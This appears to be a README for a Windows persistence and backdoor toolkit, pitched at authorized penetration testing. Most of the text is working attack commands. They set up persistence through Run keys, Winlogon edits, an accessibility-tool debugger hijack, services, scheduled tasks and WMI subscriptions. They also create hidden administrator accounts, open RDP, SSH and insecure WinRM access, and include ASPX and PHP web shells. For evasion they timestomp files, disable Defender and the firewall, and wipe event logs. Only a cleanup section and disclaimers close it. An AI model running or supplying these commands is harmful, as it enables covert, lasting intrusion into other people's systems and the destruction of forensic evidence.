Advanced Windows persistence techniques and backdoor methodologies for authorized penetration testing, red team operations, and security research.
This repository contains a comprehensive collection of Windows persistence techniques, backdoor methodologies, and stealth mechanisms designed for professional security assessments. The toolkit provides multiple vectors for maintaining access to Windows systems through various persistence mechanisms, from basic registry modifications to advanced WMI event subscriptions.
# Add persistence via Run key (system-wide)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "UpdateService" /t REG_SZ /d "C:\Windows\system32\backdoor.exe"
# User-specific persistence
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "UserService" /t REG_SZ /d "C:\Users\Public\service.exe"
# Create Windows service
sc create "WindowsUpdateService" binPath= "C:\Windows\system32\updater.exe" start= auto DisplayName= "Windows Update Service"
# Start service
sc start "WindowsUpdateService"
# Daily task
schtasks /create /tn "SystemMaintenance" /tr "C:\Windows\maintenance.exe" /sc daily /st 14:30
# Startup task
schtasks /create /tn "StartupTask" /tr "C:\Windows\startup.exe" /sc onstart /ru SYSTEM
# System-wide (requires admin)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "UpdateService" /t REG_SZ /d "C:\Windows\system32\update.exe"
# User-specific
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "UserService" /t REG_SZ /d "C:\Users\Public\service.exe"
# RunOnce (executes once)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "SystemCheck" /t REG_SZ /d "C:\temp\check.exe"
# Winlogon Shell replacement
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe,C:\Windows\backdoor.exe"
# Userinit modification
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Windows\backdoor.exe"
# Image File Execution Options
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\Windows\backdoor.exe"
# Every 5 minutes
schtasks /create /tn "SystemMonitor" /tr "C:\Windows\monitor.exe" /sc minute /mo 5 /ru SYSTEM
# Daily at specific time
schtasks /create /tn "DailyCheck" /tr "C:\Windows\check.exe" /sc daily /st 14:30
# Weekly maintenance
schtasks /create /tn "WeeklyMaintenance" /tr "C:\Windows\maintenance.exe" /sc weekly /d SUN /st 02:00
# On system startup
schtasks /create /tn "StartupService" /tr "C:\Windows\startup.exe" /sc onstart /ru SYSTEM
# On user logon
schtasks /create /tn "LogonScript" /tr "C:\Windows\logon.exe" /sc onlogon
# On system idle
schtasks /create /tn "IdleTask" /tr "C:\Windows\idle.exe" /sc onidle /i 10
# Create new service
sc create "SecurityHealthService" binPath= "C:\Windows\system32\security.exe" start= auto DisplayName= "Windows Security Health Service"
# Set service description
sc description "SecurityHealthService" "Monitors system security health and provides security updates"
# Configure service failure actions
sc failure "SecurityHealthService" reset= 86400 actions= restart/5000/restart/5000/restart/5000
# Start service
sc start "SecurityHealthService"
# Modify existing service
sc config "Themes" binPath= "C:\Windows\system32\svchost.exe -k netsvcs -p -s Themes && C:\Windows\backdoor.exe"
# Change service startup type
sc config "SecurityHealthService" start= auto
# Set service dependencies
sc config "SecurityHealthService" depend= "RpcSs/RPCSS"
# Create WMI event filter (triggers every 30 minutes)
wmic /namespace:\\root\subscription PATH __EventFilter CREATE Name="SystemPerformanceFilter", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 1800 WHERE TargetInstance ISA 'Win32_PerfRawData_PerfOS_System'"
# Create command line event consumer
wmic /namespace:\\root\subscription PATH CommandLineEventConsumer CREATE Name="SystemPerformanceConsumer", CommandLineTemplate="C:\Windows\system32\performance.exe"
# Bind filter to consumer
wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"SystemPerformanceFilter\"", Consumer="CommandLineEventConsumer.Name=\"SystemPerformanceConsumer\""
# All users startup folder
copy "backdoor.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SystemUpdate.exe"
# Alternative system startup location
copy "backdoor.exe" "C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup\startup.exe"
# Current user startup
copy "backdoor.exe" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\UserUpdate.exe"
# Specific user startup
copy "backdoor.exe" "C:\Users\TargetUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\service.exe"
# Create hidden admin user
net user /add backdoor P@ssw0rd123!
net localgroup administrators backdoor /add
# Hide from login screen
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v backdoor /t REG_DWORD /d 0
# Set password never expires
wmic useraccount where "name='backdoor'" set PasswordExpires=FALSE
# Enable Remote Desktop
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
# Enable RDP through Windows Firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
# Start Terminal Service
net start TermService
# Set RDP port (optional)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389
# Install OpenSSH Server
Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0
# Start SSH service
Start-Service sshd
# Set service to automatic
Set-Service -Name sshd -StartupType 'Automatic'
# Configure firewall
New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22
# Create SSH directory
New-Item -Type Directory -Path "C:\Users\backdoor\.ssh"
# Add authorized key
Set-Content -Path "C:\Users\backdoor\.ssh\authorized_keys" -Value "ssh-rsa AAAAB3Nza... your-public-key"
# Set proper permissions
icacls "C:\Users\backdoor\.ssh\authorized_keys" /inheritance:r /grant "backdoor:F"
# Enable WinRM
winrm quickconfig -q
# Configure WinRM for unencrypted traffic
winrm set winrm/config/service @{AllowUnencrypted="true"}
# Set authentication methods
winrm set winrm/config/service/auth @{Basic="true"}
# Add user to Remote Management group
net localgroup "Remote Management Users" backdoor /add
# Enable PowerShell remoting
Enable-PSRemoting -Force
# Set execution policy
Set-ExecutionPolicy RemoteSigned -Force
# Configure trusted hosts (if needed)
Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object sender, EventArgs e) {
string cmd = Request.QueryString["cmd"];
if (!string.IsNullOrEmpty(cmd)) {
Process proc = new Process();
proc.StartInfo.FileName = "cmd.exe";
proc.StartInfo.Arguments = "/c " + cmd;
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start();
Response.Write("<pre>" + proc.StandardOutput.ReadToEnd() + "</pre>");
proc.Close();
}
}
</script>
<?php
if(isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
echo "<pre>";
system($cmd);
echo "</pre>";
}
?>
# Hide files
attrib +h +s C:\Windows\system32\backdoor.exe
# Set system timestamps
powershell "(Get-Item 'C:\Windows\system32\backdoor.exe').CreationTime = (Get-Item 'C:\Windows\system32\explorer.exe').CreationTime"
powershell "(Get-Item 'C:\Windows\system32\backdoor.exe').LastWriteTime = (Get-Item 'C:\Windows\system32\explorer.exe').LastWriteTime"
# Disable Windows Defender (requires admin)
powershell "Set-MpPreference -DisableRealtimeMonitoring $true"
powershell "Add-MpPreference -ExclusionPath C:\Windows\system32"
powershell "Add-MpPreference -ExclusionExtension .exe"
# Disable Windows Firewall
netsh advfirewall set allprofiles state off
# Clear specific event logs
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
wevtutil cl "Windows PowerShell"
# Clear all event logs
for /f "tokens=1" %i in ('wevtutil el') do wevtutil cl "%i"
# Disable PowerShell logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableTranscripting" -Value 0
# Run as legitimate service
sc create "WindowsSecurityHealthService" binPath= "C:\Windows\system32\svchost.exe -k SecurityHealth -p -s SecurityHealthService"
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\system32\backdoor.dll"
# Replace legitimate DLL
copy "malicious.dll" "C:\Windows\system32\version.dll"
copy "malicious.dll" "C:\Program Files\Application\missing.dll"
# Create backdoor user
net user /add support P@ssw0rd2024!
net localgroup administrators support /add
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v support /t REG_DWORD /d 0
# Enable RDP
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net start TermService
# Connect: rdesktop -u support -p 'P@ssw0rd2024!' target-ip
# Registry persistence
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemService" /t REG_SZ /d "C:\Windows\system32\service.exe"
# Service persistence
sc create "SystemService" binPath= "C:\Windows\system32\service.exe" start= auto DisplayName= "System Service"
sc start "SystemService"
# Scheduled task backup
schtasks /create /tn "SystemService" /tr "C:\Windows\system32\service.exe" /sc onstart /ru SYSTEM
# Create WMI event subscription for stealth persistence
wmic /namespace:\\root\subscription PATH __EventFilter CREATE Name="SecurityUpdate", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfRawData_PerfOS_System'"
wmic /namespace:\\root\subscription PATH CommandLineEventConsumer CREATE Name="SecurityConsumer", CommandLineTemplate="C:\Windows\system32\SecurityUpdate.exe"
wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"SecurityUpdate\"", Consumer="CommandLineEventConsumer.Name=\"SecurityConsumer\""
# Remove Run keys
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "UpdateService" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "UserService" /f
# Restore Winlogon settings
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\system32\userinit.exe," /f
# Stop and remove services
sc stop "SecurityHealthService"
sc delete "SecurityHealthService"
# Remove service registry entries
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
# Remove scheduled tasks
schtasks /delete /tn "SystemMonitor" /f
schtasks /delete /tn "DailyCheck" /f
schtasks /delete /tn "StartupService" /f
# Remove WMI subscriptions
wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding WHERE "Filter=\"__EventFilter.Name='SystemPerformanceFilter'\"" DELETE
wmic /namespace:\\root\subscription PATH CommandLineEventConsumer WHERE "Name='SystemPerformanceConsumer'" DELETE
wmic /namespace:\\root\subscription PATH __EventFilter WHERE "Name='SystemPerformanceFilter'" DELETE
# Remove backdoor files
del "C:\Windows\system32\backdoor.exe"
del "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SystemUpdate.exe"
del "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\UserUpdate.exe"
# Remove backdoor users
net user backdoor /delete
net user support /delete
IMPORTANT: This toolkit is designed for authorized penetration testing, security research, and educational purposes only.
The authors and contributors are not responsible for any misuse of this toolkit. Users are solely responsible for ensuring their activities are legal and authorized.
We welcome contributions from the security community!
git checkout -b feature/new-technique)git commit -am 'Add new persistence technique')git push origin feature/new-technique)Special thanks to the security research community, penetration testers, and red team professionals who continuously advance the field of offensive security and help organizations improve their defensive capabilities.
โ ๏ธ Remember: Use responsibly, ethically, and legally. Always obtain proper authorization before testing.
๐ Security Research Disclaimer: This toolkit is intended to help security professionals identify and remediate persistence techniques in their environments. It should only be used in authorized testing scenarios.